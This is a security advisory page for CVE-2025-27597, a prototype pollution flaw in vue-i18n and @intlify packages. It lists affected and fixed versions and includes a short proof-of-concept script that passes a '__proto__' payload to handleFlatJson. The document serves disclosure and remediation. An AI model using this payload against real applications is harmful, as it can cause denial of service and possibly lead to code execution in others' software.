CVE-2025-27597: Vue I18n Prototype Pollution in `handleFlatJson`
First published: Fri Mar 07 2025(Updated: )
**Vulnerability type:** Prototype Pollution **Vulnerability Location(s):** ```js # v9.1 node_modules/@intlify/message-resolver/index.js # v9.2 or later node_modules/@intlify/vue-i18n-core/index.js ``` **Description:** The latest version of `@intlify/message-resolver (9.1)` and `@intlify/vue-i18n-core (9.2 or later)`, (previous versions might also affected), is vulnerable to Prototype Pollution through the entry function(s) `handleFlatJson`. An attacker can supply a payload with Object.prototype setter to introduce or modify properties within the global prototype chain, causing denial of service (DoS) a the minimum consequence. Moreover, the consequences of this vulnerability can escalate to other injection-based attacks, depending on how the library integrates within the application. For instance, if the polluted property propagates to sensitive Node.js APIs (e.g., exec, eval), it could enable an attacker to execute arbitrary commands within the application's context. **PoC:** ```bash // install the package with the latest version ~$ npm install @intlify/message-resolver@9.1.10 // run the script mentioned below ~$ node poc.js //The expected output (if the code still vulnerable) is below. // Note that the output may slightly differs from function to another. Before Attack: {} After Attack: {"pollutedKey":123} ``` ```js // poc.js (async () => { const lib = await import('@intlify/message-resolver'); var someObj = {} console.log("Before Attack: ", JSON.stringify({}.__proto__)); try { // for multiple functions, uncomment only one for each execution. lib.handleFlatJson ({ "__proto__.pollutedKey": "pollutedValue" }) } catch (e) { } console.log("After Attack: ", JSON.stringify({}.__proto__)); delete Object.prototype.pollutedKey; })(); ```
Credit: security-advisories@github.com
| Affected Software | Affected Version | How to fix |
|---|---|---|
| npm/vue-i18n | >=11.0.0-beta.0<11.1.2 | 11.1.2 |
| npm/vue-i18n | >=10.0.0-alpha.1<10.0.6 | 10.0.6 |
| npm/petite-vue-i18n | >=11.0.0-beta.0<11.1.2 | 11.1.2 |
| npm/@intlify/vue-i18n-core | >=11.0.0-beta.0<11.1.2 | 11.1.2 |
| npm/@intlify/vue-i18n-core | >=10.0.0-alpha.1<10.0.6 | 11.1.2 |
| npm/@intlify/core | >=9.1.0<9.1.11 | 9.1.11 |
| npm/@intlify/core-base | >=9.1.0<9.1.11 | 9.1.11 |
| npm/vue-i18n | >=9.1.0<9.14.3 | 9.14.3 |
| npm/petite-vue-i18n | >=10.0.0<10.0.6 | 10.0.6 |
| npm/@intlify/vue-i18n-core | >=9.2.0<9.14.3 | 9.14.3 |
| npm/@intlify/message-resolver | >=9.1.0<9.1.11 | 9.1.11 |
Never miss a vulnerability like this again
Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.
Reference Links
- https://github.com/intlify/vue-i18n/security/advisories/GHSA-p2ph-7g93-hw3m
- https://github.com/intlify/vue-i18n/commit/4bb6eacda7fc2cde5687549afa0efb27ca40862a
- https://github.com/intlify/vue-i18n/commit/d21e06a7440eed8ada7f522b22fcf830b98d3a53
- https://github.com/intlify/vue-i18n/commit/fbda9988d3ddd3a1a21740d506d2c183d6b6e36a
- https://github.com/intlify/vue-i18n/commit/feaf13fcff427f2cb1d5ec8076e639506ba28f9e
- https://github.com/intlify/vue-i18n/releases/tag/v10.0.6
- https://github.com/intlify/vue-i18n/releases/tag/v11.1.2
- https://github.com/intlify/vue-i18n/releases/tag/v9.14.3
- https://nvd.nist.gov/vuln/detail/CVE-2025-27597
- https://github.com/advisories/GHSA-p2ph-7g93-hw3m (Advisory)
Frequently Asked Questions
What is the severity of CVE-2025-27597?
CVE-2025-27597 is classified as a critical prototype pollution vulnerability.
How do I fix CVE-2025-27597?
To remediate CVE-2025-27597, update the affected packages to their respective fixed versions: @intlify/message-resolver to 9.1.11, vue-i18n to 11.1.2, or @intlify/vue-i18n-core to 11.1.2.
Which software is affected by CVE-2025-27597?
CVE-2025-27597 affects multiple versions of vue-i18n, petite-vue-i18n, and @intlify packages.
What are the consequences of CVE-2025-27597?
Exploitation of CVE-2025-27597 could allow attackers to manipulate object structures and potentially execute arbitrary code.
How can I check if my system is vulnerable to CVE-2025-27597?
To check for vulnerability, inspect installed versions of @intlify/message-resolver, vue-i18n, and related packages against the affected versions listed in CVE-2025-27597.
- agent/weakness
- agent/title
- agent/softwarecombine
- agent/description
- agent/first-publish-date
- agent/type
- agent/severity
- agent/author
- agent/event
- collector/nvd-api
- source/NVD
- agent/references
- collector/nvd-cve
- agent/source
- agent/tags
- collector/github-advisory-latest
- source/GitHub
- alias/GHSA-p2ph-7g93-hw3m
- alias/CVE-2025-27597
- agent/software-canonical-lookup
- agent/last-modified-date
- collector/mitre-cve
- source/MITRE
- collector/epss-latest
- source/FIRST
- agent/epss
- collector/github-advisory
- package-manager/npm